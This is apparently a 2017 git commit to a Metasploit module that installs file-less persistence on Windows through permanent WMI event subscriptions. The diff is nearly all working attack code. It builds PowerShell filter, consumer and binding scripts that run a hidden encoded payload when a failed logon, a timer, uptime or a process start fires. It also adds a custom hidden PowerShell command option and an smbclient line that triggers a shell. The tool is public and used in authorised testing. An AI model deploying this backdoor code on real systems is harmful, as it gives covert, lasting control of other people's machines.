added heredoc to tidy formatting

NickTyrer · NickTyrer · commit 24404ae40fc2 · 2017-06-21T18:15:13.000+01:00
changed USER persistence method to EVENT to better describe technique
removed "auditpol.exe /set /subcategory:Logon /failure:Enable" command from subscription_event method to be more opsec safe
added CUSTOM_PS_COMMAND advanced option
updated description to reflect changes
diff --git a/modules/exploits/windows/local/wmi_persistence.rb b/modules/exploits/windows/local/wmi_persistence.rb
@@ -19,14 +19,16 @@ def initialize(info = {})
       'Name'             => 'WMI Event Subscription Persistence',
       'Description'      => %q{
           This module will create a permanent WMI event subscription to achieve file-less persistence using one
-          of four methods. The USERNAME method will create an event filter that will query the event log for an
-          EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER.
-          When these criteria are met a command line event consumer will trigger an encoded powershell payload.
-          The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL.
-          The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4
-          minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is
-          started. This module requires administrator level privileges as well as a high integrity process.
-          It is also recommended not to use stageless payloads due to powershell script length limitations.
+          of four methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER
+          (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing
+          must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon
+          /failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.
+          The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON
+          method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS
+          method will create an event filter that triggers the payload when the specified process is started. Additionally a custom
+          command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires
+          administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads
+          due to powershell script length limitations.
         },
       'Author'           => ['Nick Tyrer <@NickTyrer>'],
       'License'          => MSF_LICENSE,
@@ -48,7 +50,7 @@ def initialize(info = {})
 
     register_options([
       OptEnum.new('PERSISTENCE_METHOD',
-        [true, 'Method to trigger the payload.', 'USERNAME', ['USERNAME','INTERVAL','LOGON','PROCESS']]),
+        [true, 'Method to trigger the payload.', 'EVENT', ['EVENT','INTERVAL','LOGON','PROCESS']]),
       OptInt.new('EVENT_ID_TRIGGER',
         [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),
       OptString.new('USERNAME_TRIGGER',
@@ -60,6 +62,12 @@ def initialize(info = {})
       OptString.new('CLASSNAME',
         [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
     ])
+
+    register_advanced_options(
+      [
+        OptString.new('CUSTOM_PS_COMMAND',
+        [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be encolsed in quotes)', false, ]),
+    ])
   end
 
 
@@ -82,91 +90,96 @@ def exploit
    case datastore['PERSISTENCE_METHOD']
     when 'LOGON'
       psh_exec(subscription_logon)
-      print_good "Backdoor installed!"
+      print_good "Persistence installed!"
       @cleanup
     when 'INTERVAL'
       psh_exec(subscription_interval)
-      print_good "Backdoor installed!"
+      print_good "Persistence installed!"
       @cleanup
-    when 'USERNAME'
-      psh_exec(subscription_user)
-      print_good "Backdoor installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
+    when 'EVENT'
+      psh_exec(subscription_event)
+      print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
       @cleanup
     when 'PROCESS'
       psh_exec(subscription_process)
-      print_good "Backdoor installed!"
+      print_good "Persistence installed!"
       @cleanup
     end
    end
 
 
   def build_payload
-   cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+    if datastore['CUSTOM_PS_COMMAND']
+      script_in = datastore['CUSTOM_PS_COMMAND']
+      compressed_script = compress_script(script_in, eof = nil)
+      encoded_script = encode_script(compressed_script, eof = nil)
+      generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script)
+    else
+      cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+    end
   end
 
 
   def subscription_logon
    command = build_payload
    class_name = datastore['CLASSNAME']
-   "$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
+   <<-HEREDOC
+    $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
     $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+   HEREDOC
   end
 
 
   def subscription_interval
    command = build_payload
    class_name = datastore['CLASSNAME']
    callback_interval = datastore['CALLBACK_INTERVAL']
-   "$timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
+   <<-HEREDOC
+    $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
     $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'}
     $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+   HEREDOC
   end
 
 
-  def subscription_user
+  def subscription_event
    command = build_payload
    event_id = datastore['EVENT_ID_TRIGGER']
    username = datastore['USERNAME_TRIGGER']
    class_name = datastore['CLASSNAME']
-   "auditpol.exe /set /subcategory:Logon /failure:Enable
+   <<-HEREDOC
     $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'}
     $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+   HEREDOC
   end
 
 
   def subscription_process
    command = build_payload
    class_name = datastore['CLASSNAME']
    process_name = datastore['PROCESS_TRIGGER']
-   "$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'}
+   <<-HEREDOC
+    $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'}
     $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+   HEREDOC
   end
 
 
   def log_file(log_path = nil) # Thanks Meatballs for this
-    # Get hostname
     host = session.session_host
-
-    # Create Filename info to be appended to downloaded files
     filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
-    # Create a directory for the logs
     if log_path
       logs = ::File.join(log_path, 'logs', 'wmi_persistence',
       Rex::FileUtils.clean_path(host + filenameinfo))
     else
       logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',
       Rex::FileUtils.clean_path(host + filenameinfo))
     end
-
-    # Create the log directory
     ::FileUtils.mkdir_p(logs)
-
-    # logfile name
     logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')
     logfile
   end
